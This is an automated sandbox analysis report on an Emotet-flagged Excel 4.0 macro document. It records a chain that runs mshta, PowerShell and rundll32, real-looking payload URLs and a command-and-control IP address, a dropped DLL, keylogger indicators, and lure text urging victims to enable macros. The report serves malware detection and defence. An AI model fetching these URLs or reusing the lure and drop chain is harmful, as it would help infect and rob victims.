Source: rundll32.exe, 00000011.00000002.665959385.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/OBNTMeNNkbReOLJsQFZWnjOBBXtVIsPD
Source: rundll32.exe, 00000011.00000002.665959385.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/OBNTMeNNkbReOLJsQFZWnjOBBXtVIsPD(
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000003.424477638.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.426878842.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.407726472.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.424477638.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.426878842.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.407726472.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.900000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2380000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.450000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.870000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.20d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2390000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2460000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2470000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.900000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2950000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2460000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.490000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2690000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2500000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2920000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2690000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2330000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2310000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ee0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f80000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2500000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2380000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ad0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.20d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2920000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2580000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2390000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f70000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ad0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ee0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e20000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.628239450.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579516462.0000000002F81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578753492.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579573149.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628717414.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666105711.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531281525.0000000002690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628962814.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579450603.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.530998249.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584387125.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628740337.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531348991.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579018435.0000000000871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628605585.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579089142.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578701099.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531651304.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668076705.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631192468.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531562196.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531472229.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665855129.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579042470.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665636604.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.533513954.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666036219.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531316310.00000000026C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628359803.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629146934.0000000002581000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665505187.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578997040.0000000000510000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584415832.0000000000451000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579200917.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628692129.0000000000451000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629306052.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584465351.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665779039.0000000000491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.534212368.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629101043.0000000002500000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579066307.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.485021946.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.533715209.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665569984.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629429951.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631454730.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.484854789.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631287272.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578974620.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531136750.0000000000511000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531180558.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666081220.0000000002460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579126400.0000000000A61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629384040.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531037998.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531419796.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579285287.0000000002390000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531598010.0000000002F71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629265921.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.484571312.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531211991.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531504516.0000000002951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628188848.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579247284.0000000002311000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629054225.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531096953.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: 2022-28-01_1203.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: 2022-28-01_1203.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31 32 33 34 35 36 3
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains OLE streams with names of living off the land binaries
Source: 2022-28-01_1203.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: 2022-28-01_1203.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: 2022-28-01_1203.xls Initial sample: EXEC
Source: 2022-28-01_1203.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
